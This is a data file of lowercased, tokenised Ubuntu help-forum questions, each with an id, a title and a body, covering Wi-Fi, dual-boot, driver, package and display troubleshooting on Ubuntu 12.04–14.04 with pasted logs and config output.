459012	whatsapp help for ubuntu 14.04 !	hey i have found a way to use whatsapp on ubuntu using pidgin ! but i do n't understand everything on the site ... can someone help me ? i have completed the pidgin installation and whatsapp plugin . now i have to do the sms whatsapp verification . see the script for that here : http : //samtinkers.wordpress.com/2014/01/11/install-whatsapp-on-ubuntu-12-04-12-10-13-04-13-10-mint-13141516/ can someone tell me how do i exactly do the commands and codes etc . thanks ,
459013	ubuntu 14.04 wifi conected but does n't have internet	i just installed ubuntu 14.04 on asus n56v . during the instalation and the first day of using it the connection was working perfectly . after i switched it off i did n't have internet anymore despite that the wifi appears to be connected on the router . any hints ? ps : i am new in using ubuntu so please be precize with your answers thanks a lot
459015	trying desperately to switch from windows xp to ubuntu 12.04	my son has a laptop that i installed ubuntu on as dual boot . the other os is windows xp , that runs perfectly and has for some time now . i had a hard drive , installed it , installed windows xp ( sp2 ) on it , then put in the same ubuntu disk i used on my son 's computer , and it went through the entire installation/setup process . then when i went to reboot the computer , i was expecting to have to select which operating system , but it goes straight into trying to boot up on ubuntu , it goes through the initial splash screen , displaying information about my system , then the screen goes black and the cursor is blinking in the top left-hand corner of the screen , then goes off and comes back on screen one or two lines further down , but nothing other than the cursor is on the screen , and that is where it stays . it will not do anything else . i can press ctrl+alt+del , and it will reboot or i can manually power down , but it comes back to the same point . this is home built computer that i have been using for a long time . i just want to get away from microsoft , other than dual boot for itunes . my hardware specs : ⠀amd 64 processor 1.8ghz ⠀asus motherboard ⠀asus video card in agp slot ⠀sound card ⠀2 or 3 gb ram i love ubuntu , is there anything to be done ?
459017	installing two versions of php in ubuntu 14.04	how to install two versions of php in ubuntu 14.04 . help me , please . i need test the app of my client in php 5.3 because the server run in this version , but i can not uninstall the php 5.5 of my workstation because of my recent work
459020	ubuntu 12.10 not recognizing new ssd and disk drive	y'all ? ! i have a adata usa premier pro sp600 2.5-inch 32 gb sata iii mlc internal solid state drive asp600s3-32gm-c and a optical drive which my machine does not recognize . everything 'seems ' to be hooked up properly . i currently installed and running ubuntu 12.10 via 8 gb usb stick . i do n't seem to see whats the issue . any help ?
459021	external monitor/outputs not dectected	when i plug in an external monitor , ubuntu does n't detect its existence and wo n't output anything to it . the laptop is a toshiba p50 with the 4th generation i7 and just the integrated intel video card . i 've tried both vga and hdmi monitor connections with the same results . i 've also used intel drivers from a ppa and completely removed ubuntu-desktop and deps and reinstalled everything . others in my office with the same laptop do n't have this issue . output of xrandr and other possibly helpful things ( i 'll amend as requested ) : % xrandr # with or without monitors plugged in xrandr : failed to get size of gamma for output default screen 0 : minimum 1920 x 1080 , current 1920 x 1080 , maximum 1920 x 1080 default connected 1920x1080+0+0 0mm x 0mm 1920x1080 0.0* % lspci | grep -i vga 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) xorg.conf generated with x -configure : section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' screen 2 `` screen2 '' rightof `` screen1 '' screen 3 `` screen3 '' rightof `` screen2 '' inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` built-ins '' endsection section `` module '' load `` glx '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor2 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor3 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` defaultrefresh '' # [ < bool > ] # option `` modesetclearscreen '' # [ < bool > ] identifier `` card0 '' driver `` vesa '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` swcursor '' # [ < bool > ] # option `` kmsdev '' # < str > # option `` shadowfb '' # [ < bool > ] identifier `` card1 '' driver `` modesetting '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` noaccel '' # [ < bool > ] # option `` accelmethod '' # < str > # option `` backlight '' # < str > # option `` dri '' # < str > # option `` colorkey '' # < i > # option `` videokey '' # < i > # option `` tiling '' # [ < bool > ] # option `` linearframebuffer '' # [ < bool > ] # option `` vsync '' # [ < bool > ] # option `` pageflip '' # [ < bool > ] # option `` swapbufferswait '' # [ < bool > ] # option `` triplebuffer '' # [ < bool > ] # option `` xvpreferoverlay '' # [ < bool > ] # option `` hotplug '' # [ < bool > ] # option `` reprobeoutputs '' # [ < bool > ] # option `` xvmc '' # [ < bool > ] # option `` zaphodheads '' # < str > # option `` virtualheads '' # < i > # option `` tearfree '' # [ < bool > ] # option `` percrtcpixmaps '' # [ < bool > ] # option `` fallbackdebug '' # [ < bool > ] # option `` debugflushbatches '' # [ < bool > ] # option `` debugflushcaches '' # [ < bool > ] # option `` debugwait '' # [ < bool > ] # option `` buffercache '' # [ < bool > ] identifier `` card2 '' driver `` intel '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` rotate '' # < str > # option `` fbdev '' # < str > # option `` debug '' # [ < bool > ] identifier `` card3 '' driver `` fbdev '' busid `` pci:0:2:0 '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` card1 '' monitor `` monitor1 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` card2 '' monitor `` monitor2 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen3 '' device `` card3 '' monitor `` monitor3 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection
459022	unable to install/remove any application/package in ubuntu 12.04 lts , error : java_home	this is the error in the `` package operation failed window '' : installarchives ( ) failed : setting up install-info ( 4.13a.dfsg.1-8ubuntu2 ) ... /etc/environment : line 3 : java_home : command not found dpkg : error processing install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : install-info error in function : setting up install-info ( 4.13a.dfsg.1-8ubuntu2 ) ... /etc/environment : line 3 : java_home : command not found dpkg : error processing install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 127 this is the info about java in my ubuntu . am not sure if all these are correctly set . update-java-alternatives -l java-1.6.0-openjdk-amd64 1061 /usr/lib/jvm/java-1.6.0-openjdk-amd64 java-1.7.0-openjdk-amd64 1051 /usr/lib/jvm/java-1.7.0-openjdk-amd64 java -version java version `` 1.6.0_30 '' openjdk runtime environment ( icedtea6 1.13.1 ) ( 6b30-1.13.1-1ubuntu2~0.12.04.3 ) openjdk 64-bit server vm ( build 23.25-b01 , mixed mode ) echo $ java_home /usr/lib/jvm/java-7-openjdk-amd64 this is the following copy and paste from terminal if i try to upgrade : balu @ balu-x550cc : ~ $ sudo apt-get upgrade [ sudo ] password for balu : reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : duplicity linux-headers-generic linux-headers-generic-lts-raring linux-image-generic-lts-raring linux-signed-image-generic-lts-raring the following packages will be upgraded : bluez bluez-alsa bluez-alsa : i386 bluez-cups bluez-gstreamer cups cups-bsd cups-client cups-common cups-ppdc curl deja-dup dpkg dpkg-dev firefox firefox-locale-en flashplugin-installer gir1.2-gdkpixbuf-2.0 gir1.2-gtk-2.0 gir1.2-gtk-3.0 gnome-control-center gnome-control-center-data gnome-settings-daemon google-chrome-stable google-talkplugin icedtea-7-jre-jamvm libbluetooth3 libcups2 libcups2 : i386 libcupscgi1 libcupsdriver1 libcupsimage2 libcupsimage2 : i386 libcupsmime1 libcupsppdc1 libcurl3-gnutls libcurl3-nss libdpkg-perl libgail-3-0 libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-0 : i386 libgdk-pixbuf2.0-common libgnome-control-center1 libgtk-3-0 libgtk-3-bin libgtk-3-common libgtk2.0-bin libgtk2.0-common libmysqlclient18 libmysqlclient18 : i386 libnm-glib-vpn1 libnm-glib4 libnm-util2 libsnmp-base libsnmp15 linux-firmware linux-generic-lts-raring linux-libc-dev linux-signed-generic-lts-raring linux-source linux-source-3.2.0 mysql-client-core-5.5 mysql-common mysql-server-core-5.5 network-manager openjdk-7-jdk openjdk-7-jre openjdk-7-jre-headless openjdk-7-jre-lib python-imaging thunderbird thunderbird-globalmenu thunderbird-gnome-support thunderbird-locale-en thunderbird-locale-en-us unity-greeter update-manager update-manager-core whoopsie 79 upgraded , 0 newly installed , 0 to remove and 5 not upgraded . 1 not fully installed or removed . need to get 0 b/319 mb of archives . after this operation , 16.2 mb of additional disk space will be used . do you want to continue [ y/n ] ? y extracting templates from packages : 100 % preconfiguring packages ... setting up install-info ( 4.13a.dfsg.1-8ubuntu2 ) ... /etc/environment : line 3 : java_home : command not found dpkg : error processing install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 127 no apport report written because maxreports is reached already errors were encountered while processing : install-info output of nano /etc/environment : path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games '' java_home = `` : usr/lib/jvm/java-7-openjdk-amd64/bin '' classpath = `` : usr/lib/jvm/java-7-openjdk-amd64/bin : /home/something etc ''
459023	compiling error checkinstall	hi i wan na compile my first package ( wine ) under ubuntu ( it 's also my first day with this os ) . i ran ./configure and make , no errors . but when i did checkinstall then i got this back : ========================= installation results =========================== make [ 1 ] : entering directory `/home/donbilbo/downloads/wine-1.5.22/tools' make [ 1 ] : `makedep ' is up to date . make [ 1 ] : leaving directory `/home/donbilbo/downloads/wine-1.5.22/tools' make [ 1 ] : entering directory `/home/donbilbo/downloads/wine-1.5.22/libs/port' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/donbilbo/downloads/wine-1.5.22/libs/port' make [ 1 ] : entering directory `/home/donbilbo/downloads/wine-1.5.22/libs/wine' version=` ( git_dir=../../.git git describe head 2 > /dev/null || echo `` wine-1.5.22 '' ) | sed -n -e ' $ s/\ ( . *\ ) /const char wine_build [ ] = `` \1 '' ; /p'` & & ( echo $ version | cmp -s - version.c ) || echo $ version > version.c || ( rm -f version.c & & exit 1 ) make [ 1 ] : leaving directory `/home/donbilbo/downloads/wine-1.5.22/libs/wine' make [ 1 ] : entering directory `/home/donbilbo/downloads/wine-1.5.22/libs/wpp' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/donbilbo/downloads/wine-1.5.22/libs/wpp' make [ 1 ] : entering directory `/home/donbilbo/downloads/wine-1.5.22/tools' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/donbilbo/downloads/wine-1.5.22/tools' make [ 1 ] : entering directory `/home/donbilbo/downloads/wine-1.5.22/tools/widl' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/donbilbo/downloads/wine-1.5.22/tools/widl' make [ 1 ] : entering directory `/home/donbilbo/downloads/wine-1.5.22/tools/winebuild' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/donbilbo/downloads/wine-1.5.22/tools/winebuild' make [ 1 ] : entering directory `/home/donbilbo/downloads/wine-1.5.22/tools/winedump' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/donbilbo/downloads/wine-1.5.22/tools/winedump' make [ 1 ] : entering directory `/home/donbilbo/downloads/wine-1.5.22/tools/winegcc' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/donbilbo/downloads/wine-1.5.22/tools/winegcc' make [ 1 ] : entering directory `/home/donbilbo/downloads/wine-1.5.22/tools/wmc' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/donbilbo/downloads/wine-1.5.22/tools/wmc' make [ 1 ] : entering directory `/home/donbilbo/downloads/wine-1.5.22/tools/wrc' gcc -c -i . -i . -i../../include -i../../include -d__winesrc__ -dincludedir= '' \ '' /usr /local/include/wine\ '' '' -wall -pipe -fno-strict-aliasing -wdeclaration-after-statement -wempty-body -wignored-qualifiers -wstrict-prototypes -wtype-limits -wunused-but-set-parameter -wwrite-strings -gdwarf-2 -gstrict-dwarf -wpointer-arith -wlogical-op -g -o2 -u_fortify_source -d_fortify_source=0 -o parser.tab.o parser.tab.c parser.y : in function ‘rsrcid_to_token’ : parser.y:2841:15 : error : ‘yylex’ undeclared ( first use in this function ) lookahead = yylex ; ^ parser.y:2841:15 : note : each undeclared identifier is reported only once for each function it appears in make [ 1 ] : *** [ parser.tab.o ] error 1 make [ 1 ] : leaving directory `/home/donbilbo/downloads/wine-1.5.22/tools/wrc' make : *** [ tools/wrc ] error 2 **** installation failed . aborting package creation . restoring overwritten files from backup ... ok cleaning up ... ok bye .
459024	gnome terminal transparent background shows desktop	i just upgraded to ubuntu 14.04 and i have the same problem i 've always had after an installation/upgrade : the terminal 's transparent background shows the desktop ( not the window that is behind it ) . i 've seen this question . most of the time , gconftool-2 -s '/apps/metacity/general/compositing_manager ' -- type bool true will get it to work , but this is not the case anymore . i 've also tried compiz -- replace which does work , but then screws a lot of other stuff up and makes things pretty unusable . is there anything else i can do to $ gnome-terminal -- version gnome terminal 3.6.2
459029	how to set open office as my default program	i installed open office 3.4 in my system ubuntu 12.04 by following steps download apache_openoffice_incubating_3.4.0_linux_x86-64_install-deb_en-us tar file and extract the file manually and cd en-us cd debs sudo dpkg -i *.deb & cd desktop-integration again use same command sudo dpkg -i *.deb here how can i set openoffice as my default program
459035	dell inspiron 17r 7720 se , sound quality sucks ? ( ubuntu 14.04 )	i 've recently made the transfer from windows 7 to ubuntu 14.04 and while it seems to be making very good use of my other hardware , the sound quality ( streaming videos , playing music ) is generally terrible ( lacking in bass , seems to only play through two speakers ) . i 've tried using pulseaudio control as well as fiddling with alsamixer settings with no luck . suggestions ?
459036	how to install alfa awus036h driver on ubuntu 12.04.4 lts ?	how to install alfa awus036h driver on ubuntu 12.04.4 lts ? i have installed `` build-essential '' and `` linux-headers-generic '' . i unpacked the driver without any problem but when do `` sudo make '' i get a message saying i do n't have a build file at `` /lib/modules/3.4.0/ '' . i tried to create the folder as root but `` /lib/modules/3.4.0/ '' is read-only . make error ( precise ) user @ localhost : ~/programs/rtl8187l_linux_1041.0209.2012 $ sudo make [ sudo ] password for user : make : *** /lib/modules/3.4.0/build : no such file or directory . stop . make : *** [ all ] error 2 version ( precise ) user @ localhost : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise
459038	bt sport error after pipelight downloaded to ubuntu 13.10	i 've just recently downloaded pipelight plugin for ubuntu 13.10 in order to watch bt sport as this needs microsoft silverlight to work . once downloaded i 've gone into the address bar and typed 'about : plugins ' on my googlechrome browser and checked silverlight plug-in . once this has been done i 've refreshed the browser and brought bt sport player back up and am getting this message `` 6030 unable to playback video . err : vc019 '' does anyone know how to get around this as i 'm new to the world on linux ?
459040	ubuntu & itunes	thinking of making the switch to linux , but wife likes itunes , especially for downloading and watching films . has there been any improvement to itunes functionality with the latest release of ubuntu ?
459041	using ubuntu to host apache	i have apache running on my ubuntu server , but i would like to know how to use my domain like server.example.com example.com being the domain . i am not sure if this is the right area to ask the question but i know the ubuntu community is helpful , so if someone could point me in the right direction that would be great . thanks !
459042	update 12.04.4 lts without uninstall cuda 6	i 'm using ubuntu 12.04.4 and , in my academic projects , i need that os have cuda 6 installed . in this moment , ubuntu 12.04.4 lts and cuda 6 work fine together . but on last days , when i try to update ubuntu , new packages will remove cuda 6 . look : the following packages will be removed : cuda cuda-6-0 cuda-documentation-6-0 cuda-samples-6-0 cuda-toolkit-6-0 freeglut3-dev libgl1-mesa-dev libglfw-dev libglu1-mesa-dev the following new packages will be installed : libx11-xcb-dev libxcb-dri2-0-dev libxcb-glx0-dev libxdamage-dev libxxf86vm-dev > x11proto-damage-dev x11proto-dri2-dev x11proto-gl-dev x11proto-xf86vidmode-dev the following packages will be upgraded : bluez bluez-alsa bluez-cups bluez-gstreamer dpkg dpkg-dev firefox firefox-locale-en flashplugin-installer gnome-settings-daemon libbluetooth3 libcairo-gobject2 libcairo2 libdpkg-perl libdrm-dev libdrm-intel1 libdrm-nouveau1a libdrm-nouveau2 libdrm-radeon1 libdrm2 libglu1-mesa libkms1 libmtdev1 libpciaccess0 linux-firmware linux-libc-dev > mesa-common-dev mesa-utils mesa-utils-extra nvidia-331-dev nvidia-331-uvm thunderbird thunderbird-gnome-support thunderbird-locale-en thunderbird-locale-en-us unity-greeter x11-apps xserver-common 38 upgraded , 9 newly installed , 9 to remove and 0 not upgraded . need to get 95.8 mb of archives . after this operation , 363 mb disk space will be freed . do you want to continue [ y/n ] ? n abort . i would like to update my ubuntu 12.04.4 without uninstall cuda 6 . how i do this ? thank you !
459044	how can i upgrade from ubuntu 12.04 to 14.04 ?	i want to upgrade my ubuntu 12.04 to 14.04 .
459047	how to prevent updating an application which is not a package ?	i loaded amd 's fglrx drivers and catalyst manager using a script downloaded from their site thusly : made myself root , then `` sh amd-install-correct-fglrx.run '' in the recovery mode command line after making / rw and purging as best i could all of the old fglrx stuff . i did have to use -- force to make it work because there was some residual fglrx thing somewhere which survived all the purging . it works , supports netflix and hdmi sound , and is wonderful in every way until the update manager decides to overwrite it with the vanilla fglrx . the setup installed as above does not appear as a package and apparently can not be locked in synaptic package manager . i suppose i 'm asking how to block an update of a package which does n't reside as such on my machine . i realize that questions like this have been asked repeatedly but the answers always seem to be aimed at preventing an update of an installed package , not the overwriting of an installation done without a package . maybe the best idea would be to figure out what the package would be named if i had it installed and block any updates to that ?
459048	flash drive installation	does ubuntu install itself on my computer 's hard drive using the usb as a loading device or does the os run off the drive itself ( only working when plugged in ) ?
459050	detecting the wireless of an hp z200	i need to get wireless on a laptop to work . hp z200 , old stuff . it has something called 801.1i if i remember correctly . i have searched for a solution for a while now . found this http : //ubuntuforums.org/showthread.php ? t=1288865 , http : //ubuntuforums.org/showthread.php ? t=1368699 have no idea what is written there . where the hell is system - > admin - > update manager ? so i followed with bcmwl-kernel-source thing . googled that bcmwl-kernel-source , downloaded something , i have a window saying dependency is not satisfiable : dkms , so i googled dkms . so , am i going the right direction ?
459052	why kerio is not working properly on ubuntu	i have both ubuntu and windows on my system . kerio works great with no problem on windows , but in linux the story is different . everytime i get connected to internet ( dsl connection ) kerio does not work . kerio is started everytime linux starts up ( i have it in init.d dir ) . to solve this issue i have to reload or restart a few times to make it work ! sometimes i have to use the below command to make it work properly : sudo dpkg-reconfigure kerio-control-vpnclient and enter all the parameters again . why is this happening ? why do i have this bizzare problem ?
459058	sounds no longer working on xubuntu	i was messing around with compiz-related settings ( something else i can not get to work , no matter what i try ) and after a restart my sound was no longer working . there seems to be two output devices now listed in my settings . i 'm fairly certain the hmdi related one should not be there . there is no hdmi device connected to this laptop and there never has been . any help is much appreciated . cheers .
459062	how to wipe clean an ntfs hard drive , with a hibernated windows	i tried to wipe clean my ntfs windows hard drive , to complete my transfer to ubuntu . however , using the ntfs-3g command resulted in : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount , '/dev/sda2 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option please keep in mind that i do not want to read-only , i want to wipe it clean and use it for storage .
459063	vga switcheroo does n't work on 14.04 intel/ati acer 5820tg	before i updated from 13.10 to 14.04 , vga switcheroo worked fine , using the free radeon-driver . now vga switcheroo does n't work anymore/does n't take effect : cat /sys/kernel/debug/vgaswitcheroo/switch 0 : igd : + : pwr:0000:00:02.0 1 : dis : : dynpwr:0000:01:00.0 2 : dis-audio : : pwr:0000:01:00.1 after trying to turn off the unused discrete graphic : echo off > /sys/kernel/debug/vgaswitcheroo/switch cat /sys/kernel/debug/vgaswitcheroo/switch 0 : igd : + : pwr:0000:00:02.0 1 : dis : : dynpwr:0000:01:00.0 2 : dis-audio : : pwr:0000:01:00.1 is there anyone with the same isue or was anyone able to use vga switcheroo on ubuntu 14.04 ? thanks
459064	why wo n't ubuntu 14.04 dual-boot with win 7 ?	recently i 've tried to install ubuntu 14.04 lts as a dual-boot to windows 7 . everything went great until it got to the installation types . it said that it did n't detect any other os . how do i get the option to install along side existing os ?
459071	how to install jre on ubuntu	i am currently using ubuntu gnome 14.10 64bit . i have never before installed software from source . i want to install the java plugin for chrome for running applets and all . i presently need it for downloading youtube videos from keepvids . i downloaded the jre-7u55-linux-x64.tar.gz file from oracle . i used : tar -xzvf jre-7u55-linux-x64.tar.gz cd jre1.7.0_55 ./configure but i get : bash : /.configure : no such file or directory the readme file there does n't contain any information about installation only license info.. can anyone help me how to install it correctly ( i am pretty comfortable with the terminal ) and add it to google chrome ... what else do i have to do ? please help . thanks in advance .
459072	i ca n't use my password	i 've just installed ubuntu 14 and setted my password but when i 'm trying to install other software and ubuntu ask me to enter my password , it 's always wrong even though i 'm sure it 's the right password . that 's also happen when i logout and try to login again
459074	how to install heidisql on ubuntu	i have been using heidisql ( an open source gui for mysql / mssql ) on windows for a while now . however , as i 'm moving to ubuntu for development , i 'd like to continue using heidisql . the website states that it can be used with an application called wine , but there is n't any documentation on how to do this .
459077	unable to enumerate usb device 3g huawei modem	i have a huawei e303s-2 3g dongle which is causing problems to enumerate . on one port the succes rate is about 10 % , on another port it enumerates most of the time , although not every time ( say 80 % ) . what can be causing this behaviour ? [ 8008.626758 ] hub 3-0:1.0 : unable to enumerate usb device on port 2 [ 8049.533811 ] hub 3-0:1.0 : unable to enumerate usb device on port 2 [ 8049.749515 ] hub 3-0:1.0 : unable to enumerate usb device on port 2 [ 8049.965232 ] hub 3-0:1.0 : unable to enumerate usb device on port 2 [ 8050.236890 ] usb 3-2 : new high-speed usb device number 59 using xhci_hcd [ 8050.254036 ] usb 3-2 : ep 0x1 - rounding interval to 32768 microframes , ep desc says 0 microframes [ 8050.254044 ] usb 3-2 : ep 0x81 - rounding interval to 32768 microframes , ep desc says 0 microframes [ 8050.254049 ] usb 3-2 : ep 0x2 - rounding interval to 32768 microframes , ep desc says 0 microframes [ 8050.254054 ] usb 3-2 : ep 0x82 - rounding interval to 32768 microframes , ep desc says 0 microframes [ 8050.255757 ] scsi97 : usb-storage 3-2:1.0 [ 8050.256011 ] scsi98 : usb-storage 3-2:1.1 [ 8051.252368 ] scsi 97:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 2 [ 8051.252504 ] scsi 98:0:0:0 : direct-access huawei sd storage 2.31 pq : 0 ansi : 2 after several connect-disconnect cycles , it would eventually enumerate on the same port : [ 9310.912876 ] usb 3-2 : new high-speed usb device number 71 using xhci_hcd [ 9310.930329 ] usb 3-2 : ep 0x5 - rounding interval to 32768 microframes , ep desc says 0 microframes [ 9310.930336 ] usb 3-2 : ep 0x87 - rounding interval to 32768 microframes , ep desc says 0 microframes [ 9310.930341 ] usb 3-2 : ep 0x6 - rounding interval to 32768 microframes , ep desc says 0 microframes [ 9310.930346 ] usb 3-2 : ep 0x88 - rounding interval to 32768 microframes , ep desc says 0 microframes [ 9310.931944 ] option 3-2:1.0 : gsm modem ( 1-port ) converter detected [ 9310.932065 ] usb 3-2 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 9310.932259 ] option 3-2:1.2 : gsm modem ( 1-port ) converter detected [ 9310.932354 ] usb 3-2 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 9310.932452 ] option 3-2:1.3 : gsm modem ( 1-port ) converter detected [ 9310.932542 ] usb 3-2 : gsm modem ( 1-port ) converter now attached to ttyusb2 [ 9310.932718 ] scsi111 : usb-storage 3-2:1.4 [ 9310.933361 ] scsi112 : usb-storage 3-2:1.5 [ 9311.928195 ] scsi 111:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 2 [ 9311.929958 ] sr0 : scsi-1 drive
459079	an example of when we need yes command	what is the usage of yes command . i follow the man yes also i try that but i want to know when we need to use this command you can follow man page to know the usage of yes . but i am looking for a time when we need that ? in which situation i need example .
459080	useradd : can not lock /etc/subuid ; try again later	so , while trying to upgrade to 14.04 i encountered this error : could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade . please report this bug against the 'update-manager ' package and include the following error message : 'e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . ' i looked into it and opened the /var/log/dist-upgrade/apt.log log file in a text editor , locating any `` broken '' packages and remove them with sudo apt-get remove . i had 33 broken packages . i typed `` sudo apt-get update & & sudo apt-get upgrade '' to see if there were any packages : there were 2 packages which did n't want to update : libboost-filesystem-dev and libboost-thread-dev , so i removed them to see if i was able to get a correct upgrade . it did n't work . i 'm now getting an error about unresolved dependencies and ca n't do anything . i tried the following ways to get out of it : sudo apt-get -f install , this is the output ( it 's in italian , sorry about that ) http : //pastebin.com/y2dtqxdq basing on this , it ca n't install this `` usermetricsservice_1.1.1+13.10.20131003-0ubuntu1_amd64.deb '' and even using software center opening it manually , gives error . sudo apt-get -u dist-upgrade , similar output as before http : //pastebin.com/k6detpzv this is the output with `` sudo dpkg -- configure -a '' : http : //pastebin.com/sej83rsp edit : after rebooting , i managed to fix the broken dependencies through `` sudo apt-get -f install '' , still i ca n't upgrade ubuntu for the same error as before and i 'm not sure sure what 's the problem here . this is the output of `` sudo lsof /etc/subuid '' lsof : warning : ca n't stat ( ) fuse.gvfsd-fuse file system /run/user/1000/gvfs output information may be incomplete .
459085	my wifi does n't work after i switch from windows to ubuntu . i can connect , but there is no internet	my wifi only works occasionally , it seems to be worst when i 'm coming off my windows boot and going straight to ubuntu . most every morning , it works perfectly fine . in my windows installation , i usually have to turn off the wireless adapter before it works , but that trick does not work in ubuntu . i 'm running 12.04 lts , 32 bit . these are my ifconfig and netstat data : wlan0 link encap : ethernet hwaddr 48:5d:60:9d:41:13 inet addr:192.168.0.100 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :4a5d:60ff : fe9d:4113/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:16 errors:0 dropped:0 overruns:0 frame:0 tx packets:193 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2804 ( 2.8 kb ) tx bytes:24647 ( 24.6 kb ) kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 wlan0 192.168.0.0 0.0.0.0 255.255.255.0 u 0 0 0 wlan0
459087	remove printer from the list permenantly	i want to remove some printers which i see in system settings- > printers section . i edited the file /etc/cups/printer.conf and it removes it temporarily , but when i reboot the machine it seems that it adds the printers automatically from the network . how can i avoid this/ remove them permanently ? i tried with sudo lpadmin -x as well .
